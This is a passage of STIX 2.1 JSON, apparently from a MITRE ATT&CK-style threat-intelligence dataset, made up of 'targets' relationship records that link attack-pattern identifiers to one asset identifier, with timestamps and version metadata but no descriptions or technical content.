"modified": "2024-07-01T10:37:15.840494", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--86784d18-db04-4d4a-aa54-dbe3685be8e2", "created": "2024-07-01T10:37:15.840502", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840503", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ca8430a3-15af-4822-a1f3-e46410b12608", "created": "2024-07-01T10:37:15.840511", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840513", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--34a80bc4-80f2-46e6-94ff-f3265a4b657c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8174a7d5-523b-4090-9fd6-241aa4c45e0c", "created": "2024-07-01T10:37:15.840520", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840522", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9d6cfcdb-161e-4f85-bd7f-9d7444c47041", "created": "2024-07-01T10:37:15.840530", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840531", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d7fd95ca-8ea6-43a9-8d90-66ae82f2fdac", "created": "2024-07-01T10:37:15.840539", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840541", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--185ee430-8874-4f50-857c-6441d579f7ba", "created": "2024-07-01T10:37:15.840548", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840550", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1e68747f-731c-4a2c-a4d4-4a9c22d52907", "created": "2024-07-01T10:37:15.840557", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840559", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3eaaaf27-56ae-4303-9ec2-dbbb558bc74a", "created": "2024-07-01T10:37:15.840567", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840569", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b3d29d5f-13c7-4c33-86fc-bbede4922c24", "created": "2024-07-01T10:37:15.840576", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840578", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--822ba4cd-3f9a-4f73-84dd-818bce1164c9", "created": "2024-07-01T10:37:15.840585", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840587", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--51a1319b-3d83-4244-bc1c-09db2ad24fdd", "created": "2024-07-01T10:37:15.840595", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840597", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--39131305-9282-45e4-ac3b-591d2d4fc3ef", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--41c9b290-7e4f-4950-b311-9d2318f08f76", "created": "2024-07-01T10:37:15.840604", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840606", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--310b2d5d-44c3-49a1-a4d9-23707684be70", "created": "2024-07-01T10:37:15.840613", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840615", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5100b777-d8f5-4f36-9d5d-6ab233996949", "created": "2024-07-01T10:37:15.840622", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840624", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a108469c-850e-46de-a1d1-ecfb3089b963", "created": "2024-07-01T10:37:15.840632", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840634", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6dc862f6-ba32-4e6d-8287-f1e9a7477b55", "created": "2024-07-01T10:37:15.840641", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840643", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2e2a3a4f-7e4e-4744-ab27-e27285232274", "created": "2024-07-01T10:37:15.840650", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840652", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--28e473c4-989c-4fa2-8a28-7e8a07e5b24b", "created": "2024-07-01T10:37:15.840659", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840661", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f631b21e-d687-4d08-9b57-9b2b66cfafca", "created": "2024-07-01T10:37:15.840668", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840670", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e6dc51ec-025d-48f0-9458-d97e1652073c", "created": "2024-07-01T10:37:15.840677", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840679", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--31ce24fa-9931-4229-8e94-85a7415f5676", "created": "2024-07-01T10:37:15.840687", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840688", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--baa4c401-c8b9-4727-a0ca-e219d3d68c75", "created": "2024-07-01T10:37:15.840696", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840698", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a963f543-b864-4023-91b4-aae90f782716", "created": "2024-07-01T10:37:15.840705", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840707", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d4066efa-5e45-4b50-8533-55c5c94e7e9d", "created": "2024-07-01T10:37:15.840714", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840716", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ab397ebb-e735-4da7-bd2a-5c0b1026338e", "created": "2024-07-01T10:37:15.840723", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840725", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d37fdfb8-72b9-4e1d-b8be-0f4bae615ce5", "created": "2024-07-01T10:37:15.840732", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840734", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--34af0ecb-c9fe-4036-8eeb-135f219205be", "created": "2024-07-01T10:37:15.840741", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840743", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a0dd743c-666a-43c3-9b3e-3ab46177e8a0", "created": "2024-07-01T10:37:15.840751", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840753", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43c9bc06-715b-42db-972f-52d25c09a20c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--95885cf5-d146-4968-8f24-8b75ca5d0132", "created": "2024-07-01T10:37:15.840760", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840762", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b0a61a98-790e-41e4-9e2a-277e21a2a835", "created": "2024-07-01T10:37:15.840769", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840771", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f948f501-725d-4f53-a524-05204f907d10", "created": "2024-07-01T10:37:15.840778", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840780", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--750e2dcb-7c3b-4569-802a-5792106d7d7d", "created": "2024-07-01T10:37:15.840788", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840790", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a428b341-bba4-4d39-bd71-6ef7f19ac60b", "created": "2024-07-01T10:37:15.840797", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840799", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5f5a7550-400a-402b-b441-ef63eb388204", "created": "2024-07-01T10:37:15.840807", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840809", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--320ee15e-b164-461e-9bac-1ddc2163cb60", "created": "2024-07-01T10:37:15.840816", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840818", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--494ab9f0-36e0-4b06-b10d-57285b040a06", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f297431e-4335-4435-bd4f-c3633066fa3f", "created": "2024-07-01T10:37:15.840825", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840827", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2d445c51-45ed-423f-8352-4a3e3728b92b", "created": "2024-07-01T10:37:15.840835", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840836", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5cd28c93-9d1c-454d-b1fd-813b205dcc99", "created": "2024-07-01T10:37:15.840844", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840846", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7dede07a-bc96-477d-8bdb-68e868fb56a3", "created": "2024-07-01T10:37:15.840853", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840855", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5475bf0c-3bcb-42b2-9ad3-dea1597ab1b7", "created": "2024-07-01T10:37:15.840862", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840864", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4d2a5b3e-340d-4600-9123-309dd63c9bf8", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b891d4f0-e1b7-4f39-af24-cd6549677ddf", "created": "2024-07-01T10:37:15.840871", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840873", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466", "target_ref": 